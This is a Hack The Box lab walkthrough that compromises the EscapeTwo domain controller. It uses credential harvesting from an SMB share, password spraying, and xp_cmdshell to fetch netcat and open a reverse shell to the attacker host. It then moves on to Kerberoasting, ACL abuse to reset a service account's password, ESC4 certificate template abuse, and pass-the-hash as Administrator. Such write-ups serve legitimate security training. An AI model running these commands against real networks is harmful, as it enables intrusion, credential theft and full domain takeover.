Hack The Box / WINDOWS / 2025-01-18
Hack The Box — EscapeTwo (Windows)
Starting with provided low-priv credentials, SMB and MSSQL enumeration yields credential reuse, WriteOwner over a CA account enables AD object abuse, and ESC4 template abuse leads to Administrator certificate authentication.
Target
- IP:
10.129.231.236
As commonly happens in real-life Windows pentests, this box starts with provided credentials:
rose / KxEPkKe6R8su
Recon
sudo nmap -sC -sV 10.129.231.236 -p- -T5 -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-14 20:07:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-14T20:08:54+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-08T17:35:00
| Not valid after: 2025-06-08T17:35:00
| MD5: 09fd:3df4:9f58:da05:410d:e89e:7442:b6ff
|_SHA-1: c3ac:8bfd:6132:ed77:2975:7f5e:6990:1ced:528e:aac5
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-08T17:35:00
| Not valid after: 2025-06-08T17:35:00
| MD5: 09fd:3df4:9f58:da05:410d:e89e:7442:b6ff
|_SHA-1: c3ac:8bfd:6132:ed77:2975:7f5e:6990:1ced:528e:aac5
|_ssl-date: 2025-01-14T20:08:54+00:00; +1s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.231.236:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.231.236:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-01-14T20:08:54+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-01-14T20:04:34
| Not valid after: 2055-01-14T20:04:34
| MD5: 8221:a4f7:c813:050e:9afd:bd48:70e0:f2d7
|_SHA-1: f30c:5004:7495:f357:e0ca:7323:8e66:b970:ec23:1fbb
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-08T17:35:00
| Not valid after: 2025-06-08T17:35:00
| MD5: 09fd:3df4:9f58:da05:410d:e89e:7442:b6ff
|_SHA-1: c3ac:8bfd:6132:ed77:2975:7f5e:6990:1ced:528e:aac5
|_ssl-date: 2025-01-14T20:08:54+00:00; +1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-14T20:08:54+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-08T17:35:00
| Not valid after: 2025-06-08T17:35:00
| MD5: 09fd:3df4:9f58:da05:410d:e89e:7442:b6ff
|_SHA-1: c3ac:8bfd:6132:ed77:2975:7f5e:6990:1ced:528e:aac5
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49685/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49686/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49702/tcp open msrpc Microsoft Windows RPC
49718/tcp open msrpc Microsoft Windows RPC
49739/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-01-14T20:08:15
|_ start_date: N/A
Add to /etc/hosts:
sequel.htbdc01.sequel.htb
SMB and AD Enumeration
List shares with provided creds:
nxc smb sequel.htb -u rose -p KxEPkKe6R8su --shares
SMB 10.129.231.236 445 DC01 Share Permissions Remark
SMB 10.129.231.236 445 DC01 ----- ----------- ------
SMB 10.129.231.236 445 DC01 Accounting Department READ
SMB 10.129.231.236 445 DC01 ADMIN$ Remote Admin
SMB 10.129.231.236 445 DC01 C$ Default share
SMB 10.129.231.236 445 DC01 IPC$ READ Remote IPC
SMB 10.129.231.236 445 DC01 NETLOGON READ Logon server share
SMB 10.129.231.236 445 DC01 SYSVOL READ Logon server share
SMB 10.129.231.236 445 DC01 Users READ
Run LDAP dump:
ldapdomaindump sequel.htb -u 'sequel.htb\rose' -p 'KxEPkKe6R8su'
Put all users in users.txt.
Collect BloodHound data:
bloodhound-python -u rose -p KxEPkKe6R8su -ns 10.129.231.236 -d 'sequel.htb' -dc 'dc01.sequel.htb' -c All --zip
A .zip file is created.
Start BloodHound:
sudo neo4j console
bloodhound --no-sandbox
Load the zip.
Access Accounting Department share:
smbclient -U 'rose' '//10.129.231.236/Accounting Department'
ls
accounting_2024.xlsx A 10217 Sun Jun 9 12:14:49 2024
accounts.xlsx A 6780 Sun Jun 9 12:52:07 2024
get accounting_2024.xlsx
get accounts.xlsx
Open accounts.xlsx (for example with Jumpshare):
https://jumpshare.com/
Found credentials:
First Name Last Name Email Username Password
Angela Martin angela@sequel.htb angela 0fwz7Q4mSpurIt99
Oscar Martinez oscar@sequel.htb oscar 86LxLBMgEWaKUnBG
Kevin Malone kevin@sequel.htb kevin Md9Wlq1E5bZnVDVo
NULL NULL sa@sequel.htb sa MSSQLP@ssw0rd!
Put all passwords in passwords.txt and spray:
nxc smb sequel.htb -u users.txt -p passwords.txt --continue-on-success
SMB 10.129.231.236 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
SMB 10.129.231.236 445 DC01 [+] sequel.htb\oscar:86LxLBMgEWaKUnBG
We now have oscar credentials.
MSSQL to Shell and Password Reuse
Connect to MSSQL as sa:
mssqlclient.py 'sequel.htb/sa:MSSQLP@ssw0rd!@10.129.231.236'
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
xp_cmdshell whoami
sequel\sql_svc
Download nc64.exe:
wget https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe
On target via xp_cmdshell:
xp_cmdshell "mkdir C:\temp"
xp_cmdshell "curl http://10.10.14.4/nc64.exe -o C:\temp\nc64.exe"
Attacker:
nc -vlnp 4444
Target:
xp_cmdshell "C:\temp\nc64.exe -e cmd.exe 10.10.14.4 4444"
We get shell as sql_svc.
Read SQL setup config:
cd C:\SQL2019\ExpressAdv_ENU
type sql-Configuration.INI
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
Validate creds:
nxc smb sequel.htb -u sql_svc -p WqSZAF6CysDQbGb3
SMB 10.129.231.236 445 DC01 [+] sequel.htb\sql_svc:WqSZAF6CysDQbGb3
Add that password to passwords.txt and spray again:
nxc smb sequel.htb -u users.txt -p passwords.txt --continue-on-success
We find:
SMB 10.129.231.236 445 DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3
Connect with WinRM:
evil-winrm -i dc01.sequel.htb -u 'ryan' -p 'WqSZAF6CysDQbGb3'
WriteOwner Abuse to Take Over ca_svc
BloodHound shows ryan has WriteOwner over ca_svc.
Run targetedKerberoast:
https://github.com/ShutdownRepo/targetedKerberoast
python3 targetedKerberoast/targetedKerberoast.py -v -d 'sequel.htb' -u 'ryan' -p 'WqSZAF6CysDQbGb3'
[+] Printing hash for (sql_svc)
$krb5tgs$23$*sql_svc$SEQUEL.HTB$sequel.htb/sql_svc*$e7f11d86a194abd2d7260c13a60c2e7b$b43090eb4510ae3b5186778485005a9f99ab8e2594f537229608343ffe56c962fdf2937d40eeac6124d01b9feb60e1bf35f2b57473f13f9205d0af2732d1cae843228688996342a40cc469897358d847a8c1269c9413bb2b2741f8af85bf97fd172dc56ae23c13b54e6f88ddef4257204dd5fc45338970f02f1b24500615d6e57a650bf4b829c439fc541c67532d66b67e8532466b77dfbc31e48cfbef67dcfb42d77dee2b2a069f6282cc0b1156409e7eecf0dbc2d034b7347715bd2661f05d353739b411e9a4568488fc6b09aa62889886f9b867e4043a4a49746ac095fd9c76189dd6c6e6fa90fc8bb1dfb3d336caac6fb6a457dbac6b9aa6978523396e2d867b376d471b38859e5ad484b8995562f90ffd43e47598a851f51fe58d4e7ada6b720069a2b9b3a74d3a60740ddaa3ee8e457b5e46eb5cb85826a7154cff7dca0b7518da0139f81247766e466fb32b6ae875795c903bdaef0ecd663dad4ae3351f6d06a6792f14b1024d12a5fc43e9aed12c334af0fe4f4b72ee1166c51a5100dcc90c01d200c5becc09fa0fa3992d4d29a4c62dc75a11bbf9d56c736bf468a7534e61bca84fdaa1be8689c8a768ce8bad0170eaf1e24dc144859d999585b8d6d06b2f346483e28ad8a9c4171069c5964ba9b428a59b3b534a293cb484e44ed3c4db3913dd308d5a9913feae76c9cbf3fcfefc09d42124bd572391098faf47ae59ad085734779bc878201ff2f9dafc4412fdbcd8d81fbf518c63bb531ee54e3b8309337ac0ef868de3eec1435c70f29c5530db7e1490907119665774e2dcef948b33f07c07a967d56c037bd0a22102f173a21aa751e0459d07026befc1f7bade60440d18b215b3f0f0e27afd75b75a75c54acc2246f2d1e0f295be21e63708b3d6e163aeab86fbc88c1c9232b940aaa1dd6c8584e18d3cf658faf0f37c37a2e96ed148b7d64d55fa629cb083caffdd823d9073b54331d66c2d9d6cdb5bb7f1cec4c14636f97532619e5e79d4928da630bdedb7fe9a4939c729818fe07d321f4b06044c8dba7435097c6d4877c8a953d906b2a6be80dd38a7d726b2975d8d47950b829fc19869f84731df2ffb9d26b4d7a01190f8d6e923f64889164c4e872a9b4de023bbafaf66a7c6cbead14eef5cab60fbc1c9fda128a4f4fa32cb57a4756ae10a6032b5f613fee7bb6bde0a42e2a418098ec621d695b657f9ab4aaa189436b24b8aaee897debb080703ffa491fbb196526d9fc1545f44550fa65316d68b0410240c92217f6c60e2a1bc7a8aa7a5e21c5c9458337a922067751ac864721e451a8e91ab23004bf16cdf19e5e97ceaedc2e2abfe7e185f77623ecc28089fa496f7cefae11878a6477dd1755d6317fbb579e2e1ac081208b29573ee0cd3bf4e899b456e97c986809b0608055f25136ce8a7f148aa7fdc67aad5cb708b5f0711
[+] Printing hash for (ca_svc)
$krb5tgs$23$*ca_svc$SEQUEL.HTB$sequel.htb/ca_svc*$20e4ce23dcc872ac84836d39d4a37359$d3e30f75b99480d62d416850a276a24eedef3e10fa5a4d09608b1543cc2ad4bfb570bc6919296580e013309f1109554b961a1a27a08252ab9b0afebc4c9f7a1b78f174f8fda616269d33ee895895a68cd20e10c9096c363da17e1d7baed9c74bb345f5555530825efa8fad0ba8ea28b5aad011ac7f92bd65c017e01a17591387370423b332a8d3df676b61023a38d3de9f8b402977d6583f21fc4206fd3286abaf23ca89584f1113e17a310dcb5651b6322fa58ea7f9cdb16845575b0b7426e0bac0db9b52ad125e72f7dd226bb354ac48a7a0ee64b6244ca35ff73409eb87f86478ca69890f1a2d7e043d7ea118794e3701adc9362786a88ac90ee103caf084910b441d4f4ef079c4a656f1d5f6fa4319637e58f877c4ddd027e5e61f9d8f9f8537e9b93123b8eda75b95e5d0cb1b558a5d2718841ff2b3d5eb86caae136ab91c596989b6759c1ba95fef387effb448642bde6fa4bfc464d225fd35f12f646e4069b5c7d5786b5980c509794bb8ba4c278eff627edb96f2ae050c5186d8f90532d1d82933d54b15fe793e24c2e929225c78decda79eee666a59422a75cd4b027b7d550c7221533557fb825828963e463a9c582ddf9a540029e511a3bf2750ba266d373c9fafb463f1322dc8e4d12583b18d1678464c70a450421acb9f7d8af0835c429b136011ee829b81d5ef8c637f55688c27be9d2aa3e31f6f089209a83afb08cc9d8f8e7eb2812283c11e7371ce1978ed5ec967d41dc611cabcab413d4b223c2edbbc9e432ce96422d3fadf5c3bb91ad419805e287c0594ec121dce493be96a1667e38a6a063688bd7bf55ea8171560c69295fea6577ec1aaea2dc90611f25b0e30f6a9165e1aa0b01c8f9dab76aefe4f6efbfdc7a42a914df6392e1bcd61d607a07f2bbcb62bd7631d8845213574dc70e604b5451ff444a3d92e2cbb59a7ee8c219591ddcfd85a610f6501074125051808a30e101644860b5ca9fec0e6b503e832841687e30509f588576e4d2b85dddad7544c6d3e390d5251101c71cbb21a9a2784d734e9d12a9d9e47b6f808b8a9309b7391ec47ec9a4b116c6b9a0efd396d4e21f0a92e8f133e9c26871a2b40217cff791796ca74111ad53890694bd1ed3da3bd4ec66f8a528097df9e3ee330f46b67bed3958d45843b66e78e6bdeef0de84425d776176378f6882a5a0b10345fd0f93f51a84395972f47330f4930e63919c618937fe51d5eb3f75608313fde9e9518cc6c26c99a6b5e7ca12acb08cf27b5e7bdd84c5ec58aeb32f4c2307eac97e4e2e43eda3176c9e2e70dfd2f13f33ed0a3e259050fe2c5dc42369529d9111ba367ff5d1bedda2beed3b81ff6afcaee8d907f56eec0fd285b9a4beb132fe67da6d7ced54c6bf9892dd37d3e998a53f1e9bf489dc247a418c2b2ba99276839da4d4c98fc18785d6513903104ce
Put ca_svc hash into file hash and crack:
hashcat -a 0 ./hash ./rockyou.txt
It does not crack.
Try owner and DACL abuse with Impacket helpers.
Download owneredit.py:
https://github.com/fortra/impacket/blob/master/examples/owneredit.py
python3 owneredit.py -action write -new-owner 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
Download dacledit.py:
https://github.com/fortra/impacket/blob/master/examples/dacledit.py
Modify this line in dacledit.py:
from impacket.msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS
to:
from msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS
Download msada_guids.py from:
https://github.com/Porchetta-Industries/CrackMapExec/blob/master/cme/helpers/msada_guids.py
Place it in the same folder as dacledit.py.
Run:
python3 dacledit.py -action 'write' -rights 'WriteMembers' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
Try bloodyAD:
https://github.com/CravateRouge/bloodyAD
python3 bloodyAD/bloodyAD.py --host 'dc01.sequel.htb' -d sequel.htb --dc-ip sequel.htb -u 'ryan' -p 'WqSZAF6CysDQbGb3' set password 'ca_svc' '!Kali12345678!'
This fails with:
Password can't be changed before -2 days, 23:59:42.826027 because of the minimum password age policy.
Try pywhisker:
git clone https://github.com/ShutdownRepo/pywhisker.git
cd pywhisker
git checkout c4ecf411a585ca4647843c8c3856e023e738a528
cd ..
python3 pywhisker/pywhisker.py -d "sequel.htb" -u "ryan" -p "WqSZAF6CysDQbGb3" --target "ca_svc" --action "add"
It does not work.
Try RPC password reset:
net rpc password "ca_svc" '!Kali12345678!' -U "sequel.htb"/"ryan"%"WqSZAF6CysDQbGb3" -S "dc01.sequel.htb"
It does not work.
Useful reference:
https://cyberkhalid.github.io/posts/ad-writeowner-user/
Use PowerView from compromised host:
. .\PowerView.ps1
set-domainobjectowner -Identity ca_svc -OwnerIdentity ryan
add-domainobjectacl -TargetIdentity ca_svc -PrincipalIdentity ryan -Rights Resetpassword
$pass = ConvertTo-SecureString '!Kali12345678!' -AsPlainText -Force
set-domainuserpassword -identity ca_svc -accountpassword $pass
Validate creds:
nxc smb sequel.htb -u ca_svc -p '!Kali12345678!'
SMB 10.129.231.236 445 DC01 [+] sequel.htb\ca_svc:!Kali12345678!
AD CS ESC4 to Administrator
Enumerate templates:
certipy find -u ca_svc -p '!Kali12345678!' -target sequel.htb -text -stdout -vulnerable
Certificate Authorities
0
CA Name : sequel-DC01-CA
DNS Name : DC01.sequel.htb
Certificate Subject : CN=sequel-DC01-CA, DC=sequel, DC=htb
Certificate Serial Number : 152DBD2D8E9C079742C0F3BFF2A211D3
Certificate Validity Start : 2024-06-08 16:50:40+00:00
Certificate Validity End : 2124-06-08 17:00:40+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : DunderMifflinAuthentication
Display Name : Dunder Mifflin Authentication
Certificate Authorities : sequel-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireCommonName
SubjectAltRequireDns
Enrollment Flag : AutoEnrollment
PublishToDs
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Enterprise Admins
Full Control Principals : SEQUEL.HTB\Cert Publishers
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
[!] Vulnerabilities
ESC4 : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions
Useful reference:
https://www.rbtsec.com/blog/active-directory-certificate-services-adcs-esc4/
Abuse template:
certipy template -dc-ip 10.129.231.236 -u ca_svc -p '!Kali12345678!' -template DunderMifflinAuthentication -target dc01.sequel.htb -save-old
[*] Successfully updated 'DunderMifflinAuthentication'
Request cert for admin UPN:
certipy req -ca sequel-DC01-CA -dc-ip 10.129.231.236 -u ca_svc -p '!Kali12345678!' -template DunderMifflinAuthentication -target dc01.sequel.htb -upn administrator@sequel.htb
[*] Saved certificate and private key to 'administrator.pfx'
Authenticate and retrieve NT hash:
certipy auth -pfx administrator.pfx
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff
WinRM as Administrator:
evil-winrm -i dc01.sequel.htb -u Administrator -H '7a8d4e04986afa8ed4060f75e5a0b3ff'
We get a shell as Administrator.